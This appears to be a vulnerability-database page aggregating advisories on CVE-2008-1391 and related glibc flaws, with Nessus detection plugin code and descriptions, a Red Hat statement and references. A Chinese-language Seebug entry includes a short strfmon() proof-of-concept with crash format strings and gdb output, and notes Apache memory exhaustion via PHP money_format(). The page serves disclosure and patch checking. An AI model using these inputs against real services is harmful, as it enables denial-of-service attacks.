value:"http://support.novell.com/security/cve/CVE-2010-0830.html" ); script_set_attribute(attribute:"solution", value:"Apply YOU patch number 12641."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_cwe_id(189); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"cpe:/o:suse:suse_linux"); script_set_attribute(attribute:"patch_publication_date", value:"2010/08/25"); script_set_attribute(attribute:"plugin_publication_date", value:"2010/10/06"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2010-2019 Tenable Network Security, Inc."); script_family(english:"SuSE Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/cpu", "Host/SuSE/release", "Host/SuSE/rpm-list"); exit(0); } include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) exit(0, "Local checks are not enabled."); if (!get_kb_item("Host/SuSE/release")) exit(0, "The host is not running SuSE."); if (!get_kb_item("Host/SuSE/rpm-list")) exit(1, "Could not obtain the list of installed packages."); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) exit(1, "Failed to determine the architecture type."); if (cpu >!< "x86_64" && cpu !~ "^i[3-6]86$") exit(1, "Local checks for SuSE 9 on the '"+cpu+"' architecture have not been implemented."); flag = 0; if (rpm_check(release:"SUSE9", reference:"glibc-2.3.3-98.114")) flag++; if (rpm_check(release:"SUSE9", reference:"glibc-devel-2.3.3-98.114")) flag++; if (rpm_check(release:"SUSE9", reference:"glibc-html-2.3.3-98.114")) flag++; if (rpm_check(release:"SUSE9", reference:"glibc-i18ndata-2.3.3-98.114")) flag++; if (rpm_check(release:"SUSE9", reference:"glibc-info-2.3.3-98.114")) flag++; if (rpm_check(release:"SUSE9", reference:"glibc-locale-2.3.3-98.114")) flag++; if (rpm_check(release:"SUSE9", reference:"glibc-profile-2.3.3-98.114")) flag++; if (rpm_check(release:"SUSE9", reference:"nscd-2.3.3-98.114")) flag++; if (rpm_check(release:"SUSE9", reference:"timezone-2.3.3-98.114")) flag++; if (rpm_check(release:"SUSE9", cpu:"x86_64", reference:"glibc-32bit-9-201008251911")) flag++; if (rpm_check(release:"SUSE9", cpu:"x86_64", reference:"glibc-devel-32bit-9-201008251304")) flag++; if (rpm_check(release:"SUSE9", cpu:"x86_64", reference:"glibc-locale-32bit-9-201008251304")) flag++; if (flag) { if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get()); else security_hole(0); exit(0); } else exit(0, "The host is not affected.");NASL family Ubuntu Local Security Checks NASL id UBUNTU_USN-944-1.NASL description Maksymilian Arciemowicz discovered that the GNU C library did not correctly handle integer overflows in the strfmon function. If a user or automated system were tricked into processing a specially crafted format string, a remote attacker could crash applications, leading to a denial of service. (Ubuntu 10.04 was not affected.) (CVE-2008-1391) Jeff Layton and Dan Rosenberg discovered that the GNU C library did not correctly handle newlines in the mntent family of functions. If a local attacker were able to inject newlines into a mount entry through other vulnerable mount helpers, they could disrupt the system or possibly gain root privileges. (CVE-2010-0296) Dan Rosenberg discovered that the GNU C library did not correctly validate certain ELF program headers. If a user or automated system were tricked into verifying a specially crafted ELF program, a remote attacker could execute arbitrary code with user privileges. (CVE-2010-0830). Note that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. last seen 2020-06-01 modified 2020-06-02 plugin id 46731 published 2010-05-26 reporter Ubuntu Security Notice (C) 2010-2019 Canonical, Inc. / NASL script (C) 2010-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/46731 title Ubuntu 6.06 LTS / 8.04 LTS / 9.04 / 9.10 / 10.04 LTS : glibc, eglibc vulnerabilities (USN-944-1) NASL family SuSE Local Security Checks NASL id SUSE_11_1_GLIBC-101026.NASL description This update of glibc fixes various bugs and security issues : CVE-2010-3847: Decoding of the $ORIGIN special value in various LD_ environment variables allowed local attackers to execute code in context of e.g. setuid root programs, elevating privileges. This issue does not affect SUSE as an assertion triggers before the respective code is executed. The bug was fixed nevertheless. CVE-2010-3856: The LD_AUDIT environment was not pruned during setuid root execution and could load shared libraries from standard system library paths. This could be used by local attackers to inject code into setuid root programs and so elevated privileges. CVE-2010-0830: Integer overflow causing arbitrary code execution in ld.so --verify mode could be induced by a specially crafted binary. CVE-2010-0296: The addmntent() function would not escape the newline character properly, allowing the user to insert arbitrary newlines to the /etc/mtab; if the addmntent() is run by a setuid mount binary that does not do extra input checking, this would allow custom entries to be inserted in /etc/mtab. CVE-2008-1391: The strfmon() function contains an integer overflow vulnerability in width specifiers handling that could be triggered by an attacker that can control the format string passed to strfmon(). CVE-2010-0015: Some setups (mainly Solaris-based legacy setups) include shadow information (password hashes) as so-called last seen 2020-06-01 modified 2020-06-02 plugin id 50367 published 2010-10-28 reporter This script is Copyright (C) 2010-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/50367 title openSUSE Security Update : glibc (openSUSE-SU-2010:0914-1) NASL family Debian Local Security Checks NASL id DEBIAN_DSA-2058.NASL description Several vulnerabilities have been discovered in the GNU C Library (aka glibc) and its derivatives. The Common Vulnerabilities and Exposures project identifies the following problems : - CVE-2008-1391, CVE-2009-4880, CVE-2009-4881 Maksymilian Arciemowicz discovered that the GNU C library did not correctly handle integer overflows in the strfmon family of functions. If a user or automated system were tricked into processing a specially crafted format string, a remote attacker could crash applications, leading to a denial of service. - CVE-2010-0296 Jeff Layton and Dan Rosenberg discovered that the GNU C library did not correctly handle newlines in the mntent family of functions. If a local attacker were able to inject newlines into a mount entry through other vulnerable mount helpers, they could disrupt the system or possibly gain root privileges. - CVE-2010-0830 Dan Rosenberg discovered that the GNU C library did not correctly validate certain ELF program headers. If a user or automated system were tricked into verifying a specially crafted ELF program, a remote attacker could execute arbitrary code with user privileges. last seen 2020-06-01 modified 2020-06-02 plugin id 46861 published 2010-06-11 reporter This script is Copyright (C) 2010-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/46861 title Debian DSA-2058-1 : glibc, eglibc - multiple vulnerabilities NASL family MacOS X Local Security Checks NASL id MACOSX_SECUPD2008-008.NASL description The remote host is running a version of Mac OS X 10.4 that does not have Security Update 2008-008 applied. This security update contains fixes for the following products : - BOM - CoreGraphics - CoreServices - Flash Player Plug-in - Libsystem - network_cmds - UDF last seen 2020-06-01 modified 2020-06-02 plugin id 35110 published 2008-12-16 reporter This script is Copyright (C) 2008-2018 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/35110 title Mac OS X Multiple Vulnerabilities (Security Update 2008-008)
Seebug
| bulletinFamily | exploit |
| description | BUGTRAQ ID: 28479 CVE ID:CVE-2008-1391 CNCVE ID:CNCVE-20081391 多个BSD平台'strfmon()'函数处理存在整数溢出,可能以受影响应用程序上下文执行任意代码。失败的尝试可导致拒绝服务。 问题代码类似如下: #include <monetary.h> ssize_t strfmon(char * restrict s, size_t maxsize, const char * restrict format, ...); - --- 1. /usr/src/lib/libc/stdlib/strfmon.c -整数溢出 主要问题存在于strfmon()函数中,当以如下方法使用这个函数时: - ---example-start-- #include <stdio.h> #include <monetary.h> int main(int argc, char* argv[]){ char buff[51]; char *bux=buff; int res; res=strfmon(bux, 50, argv[1], "0"); return 0; } - ---example-end-- 并编译,可操作如下格式串: cxib# ./pln %99999999999999999999n Segmentation fault (core dumped) 问题如下: cxib# gdb -q pln (no debugging symbols found)...(gdb) r %99999999999999999999n Starting program: /cxib/C/pln %99999999999999999999n (no debugging symbols found)...(no debugging symbols found)... Program received signal SIGSEGV, Segmentation fault. 0x2814e0e6 in memmove () from /lib/libc.so.7 (gdb) memmove()会重分配内存。 cxib# gdb -q pln (no debugging symbols found)...(gdb) r %.9999999999n Starting program: /cxib/C/pln %.9999999999n (no debugging symbols found)...(no debugging symbols found)... Program received signal SIGSEGV, Segmentation fault. 0x2814f093 in abort () from /lib/libc.so.7 下个例子是: cxib# ./pln %#99999999999999999999n Long execution time. Let's try check this process : - -------------------------- cxib# ps -aux | grep pln cxib 1843 89.1 13.2 140320 119588 p2 R+ 4:29PM 0:09.68 ./pln %#99999999999999999999n cxib# ps -aux | grep pln cxib 1843 94.7 48.4 482336 438236 p2 R+ 4:29PM 1:54.07 ./pln %#99999999999999999999n 1 VSZ=140320 2 VSZ=482336 - ---------------------------- pln会分配更多的内存,PHP在money_format()函数中使用strfmon(),当我们在Apache中使用mod_php5,我们可以建立如下利用方法,结果如下: - ---apache-child-die--- swap_pager: out of swap space swap_pager_getswapspace(16): failed Mar 15 21:03:23 cxib kernel: pid 1210 (httpd), uid 80, was killed: out of swap space - ---apache-child-die--- NetBSD NetBSD 4.0 FreeBSD FreeBSD 6.0 .x FreeBSD FreeBSD 6.0 -STABLE FreeBSD FreeBSD 6.0 -RELEASE FreeBSD FreeBSD 7.0 BETA4 FreeBSD FreeBSD 7.0 -RELENG FreeBSD FreeBSD 7.0 -PRERELEASE FreeBSD FreeBSD 7.0 FreeBSD FreeBSD 6.0 -RELEASE-p5 可联系供应商获得补丁信息: <a href=http://www.netbsd.org/ target=_blank>http://www.netbsd.org/</a> |
| id | SSV:3103 |
| last seen | 2017-11-19 |
| modified | 2008-03-29 |
| published | 2008-03-29 |
| reporter | Root |
| title | 多个BSD平台'strfmon()'函数整数溢出漏洞 |
Statements
| contributor | Tomas Hoger |
| lastmodified | 2009-09-24 |
| organization | Red Hat |
| statement | Red Hat does not consider this to be a security issue. Properly written application should not use arbitrary untrusted data as part of the format string passed to functions as strfmon or printf family functions. |
References
- http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/stdlib/strfmon.c
- http://lists.apple.com/archives/security-announce//2008//Dec/msg00000.html
- http://secunia.com/advisories/29574
- http://secunia.com/advisories/33179
- http://securityreason.com/achievement_securityalert/53
- http://securityreason.com/securityalert/3770
- http://support.apple.com/kb/HT3338
- http://www.debian.org/security/2010/dsa-2058
- http://www.securityfocus.com/archive/1/490158/100/0/threaded
- http://www.securityfocus.com/bid/28479
- http://www.securitytracker.com/id?1019722
- http://www.us-cert.gov/cas/techalerts/TA08-350A.html
- http://www.vupen.com/english/advisories/2008/3444
- https://exchange.xforce.ibmcloud.com/vulnerabilities/41504
- https://lists.opensuse.org/opensuse-security-announce/2010-10/msg00007.html